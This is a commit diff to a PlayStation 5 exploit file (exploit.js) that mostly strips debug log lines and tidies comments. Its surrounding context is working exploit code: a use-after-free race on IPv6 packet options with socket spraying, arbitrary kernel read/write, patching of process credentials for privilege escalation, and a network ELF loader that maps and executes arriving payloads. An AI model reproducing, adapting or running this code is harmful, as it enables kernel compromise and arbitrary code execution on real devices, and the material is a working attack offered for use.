Cleanup exploit code + visual clutter

Author: Cryptogenic

document/en/ps5/exploit.js

@@ -745,7 +745,9 @@ async function userland() {
     let temp_rv_store          = p.malloc(0x4);
     let fake_pktopts_buf_store = p.malloc(0x100);
 
-    await log("===== Stage 0 - Setup =====");
+    ///////////////////////////////////////////////////////////////////////
+    // Stage 0: Setup (opening fds, setting up helpers)
+    ///////////////////////////////////////////////////////////////////////
 
     // Helper functions
     function build_rthdr_msg(buf, size) {
@@ -853,8 +855,6 @@ async function userland() {
     let INADDR_ANY = 0;
     build_addr(elf_loader_sock_addr_store, AF_INET, ELF_LOADER_NET_PORT, INADDR_ANY);
 
-    print("[+] Setup networking; log = 0x" + log_sock_fd.toString(16) + ", dump = 0x" + dump_sock_fd.toString(16) + ", ELF loader = 0x" + elf_loader_sock_fd.toString(16));
-
     if (ENABLE_NET_LOGS == 1) {
         print("[+] Network logging is ENABLED. Ensure logging server is running or exploit will block until it connects.");
     }
@@ -868,8 +868,6 @@ async function userland() {
     pipe_read = p.read4(pipe_mem);
     pipe_write = p.read4(pipe_mem.add32(0x4));
 
-    await log("[+] Setup R/W pipe, read fd = 0x" + pipe_read.toString(16) + ", write fd = 0x" + pipe_write.toString(16));
-
     ///////////////////////////////////////////////////////////////////////
     // Stage 1: Trigger initial UAF and get two sockets to overlap pktopts
     ///////////////////////////////////////////////////////////////////////
@@ -899,10 +897,6 @@ async function userland() {
 
     let master_sock = p.read4(master_sock_store);
 
-    await log("  [+] master = 0x" + master_sock.toString(16));
-
-    await log("[+] Setting up pktopts + tclass (tag = 0x" + TAG_TCLASS_SPRAY + ")");
-
     // Setup cmsg for pktoptions
     p.write4(cmsg_buf_store.add32(0x00), 0x14);         // cmsg_len
     p.write4(cmsg_buf_store.add32(0x04), IPPROTO_IPV6); // cmsg_level
@@ -928,7 +922,7 @@ async function userland() {
 
     await chain.run();
 
-    await log("[+] Setting up use/free threads...");
+    await log("[+] Setting up use thread...");
 
     // Setup conditional variable stores for threads to communicate
     let thread_use_cond_continue  = p.malloc(0x8);
@@ -1047,8 +1041,7 @@ async function userland() {
             overlap_found = 1;
             overlap_idx   = i;
             overlap_sock  = p.read4(spray_fds_store.add32(i * 0x4));
-            //break;
-            await log("[+] Found overlap @ i = 0x" + overlap_idx.toString(16) + ", overlap_sock = 0x" + overlap_sock.toString(16));
+            break;
         }
     }
 
@@ -1117,8 +1110,6 @@ async function userland() {
     await chain.add_syscall_ret(spray_fds_store.add32(overlap_idx * 0x4), SYSCALL_SOCKET, AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
     await chain.run();
 
-    await log("[+] Refilled pktopts @ 0x" + tagged_tclass.toString(16));
-
     ///////////////////////////////////////////////////////////////////////
     // Stage 3: Use overlap to leak a kqueue and pktopts
     ///////////////////////////////////////////////////////////////////////
@@ -1265,8 +1256,6 @@ async function userland() {
     await chain.add_syscall_ret(spray_fds_store.add32(overlap_idx * 0x4), SYSCALL_SOCKET, AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
     await chain.run();
 
-    await log("[+] Refilled pktopts @ 0x" + tagged_tclass.toString(16));
-
     await find_victim_sock(1); // check for bad run, will implicitly run chain
 
     for (let i = 0; i < NUM_SPRAY_SOCKS; i++) {
@@ -1300,8 +1289,7 @@ async function userland() {
         return;
     }
 
-    await log("[+] Found victim sock: " + victim_sock);
-    await log("[+] Arbitrary kernel read/write should work");
+    await log("[+] Arbitrary kernel read/write established");
 
     let test_addr         = kqueue_addr;
     let kqueue_data_addr  = 0;
@@ -1390,7 +1378,6 @@ async function userland() {
     let proc_fd_addr     = 0;
 
     await log("[+] Found kernel .data base address: 0x" + data_base_addr.toString(16));
-    await log("  [+] Found allproc: 0x" + allproc_addr.toString(16));
 
     // Get ucred + fd
     await kread(allproc_addr);
@@ -1526,25 +1513,18 @@ async function userland() {
     await chain.add_syscall(SYSCALL_SETSOCKOPT, victim_sock, IPPROTO_IPV6, IPV6_PKTINFO, write_buf_store, 0x14);
     await chain.run();
 
-    await log("[+] Enabled debug menu");
+    await log("[+] Enabled debug settings");
 
     // Cleanup sockets for clean exit
-    await log("[+] Cleaning up overlap_sock");
     await inc_socket_refcount(overlap_sock);
-
-    await log("[+] Cleaning up master_sock");
     await inc_socket_refcount(master_sock);
-
-    await log("[+] Cleaning up victim_sock");
     await inc_socket_refcount(victim_sock);
 
     // Establish pipe read/write
     let pipe_filedescent = ofiles_addr.add32(pipe_read * 0x30);
-    await log("[+] Found pipe_filedescent = 0x" + pipe_filedescent);
 
     await kread(pipe_filedescent.add32(0x00)); // fde_file
     let pipe_file = p.read8(read_buf_store);
-    await log("[+] Found pipe_file = 0x" + pipe_file);
 
     await kread(pipe_file.add32(0x00)); // f_data
     let pipe_addr = p.read8(read_buf_store);
@@ -1657,8 +1637,7 @@ async function userland() {
     await chain.add_syscall_ret(scratch_store, 0x018);
     await chain.run();
 
-    await log("[+] Patched creds");
-    await log("[+] Checking, getuid = 0x" + p.read4(scratch_store).toString(16));
+    await log("[+] Patched creds, checking uid = 0x" + p.read4(scratch_store).toString(16));
     await log("[+] Launching ELF loader (port " + ELF_LOADER_NET_PORT.toString(16) + ")");
 
     ///////////////////////////////////////////////////////////////////////
@@ -1769,7 +1748,6 @@ async function userland() {
                     // Map to shadow mapping
                     await chain.add_syscall_ret(conn_ret_store, SYSCALL_MMAP, shadow_mapping_addr, aligned_memsz, 0x3, 0x11, write_handle, 0);
                     await chain.run();
-                    await log("[+] Writable alias mapped: 0x" + p.read8(conn_ret_store).toString(16));
 
                     // Copy in segment data
                     let dest = p.read8(conn_ret_store);
@@ -1781,7 +1759,6 @@ async function userland() {
                     // Map executable segment
                     await chain.add_syscall_ret(conn_ret_store, SYSCALL_MMAP, mapping_addr.add32(program_vaddr), aligned_memsz, 0x5, 0x11, exec_handle, 0);
                     await chain.run();
-                    await log("[+] Executable segment mapped: 0x" + p.read8(conn_ret_store).toString(16));
                 } else {
                     // Regular data segment
                     data_mapping_addr = mapping_addr.add32(program_vaddr);
@@ -1796,16 +1773,12 @@ async function userland() {
                         let src_qword = p.read8(elf_store.add32(program_offset + i));
                         p.write8(dest, src_qword);
                     }
-
-                    await log("[+] Data mapped: 0x" + p.read8(conn_ret_store).toString(16));
                 }
             }
 
             // TODO: Dynamic / relocations
         }
 
-        await log("  [+] Executing!");
-
         let test_payload_store      = p.malloc(0x8);
         let pthread_handle_store    = p.malloc(0x8);
         let pthread_value_store     = p.malloc(0x8);
@@ -1816,11 +1789,12 @@ async function userland() {
         p.write8(args.add32(0x10), test_payload_store); // arg3
 
         // Execute payload in pthread
+        await log("  [+] Executing!");
         await chain.call(libKernelBase.add32(OFFSET_lk_pthread_create_name_np), pthread_handle_store, 0x0, mapping_addr.add32(elf_entry_point), args, p.stringify("payload"));
 
         // Join pthread and wait until we're finished executing
         await chain.call(libKernelBase.add32(OFFSET_lk_pthread_join), p.read8(pthread_handle_store), pthread_value_store);
-        await log("  [+] Executed, out = 0x" + p.read8(test_payload_store).toString(16));
+        await log("  [+] Finished, out = 0x" + p.read8(test_payload_store).toString(16));
     }
 
     await log("[+] Done.");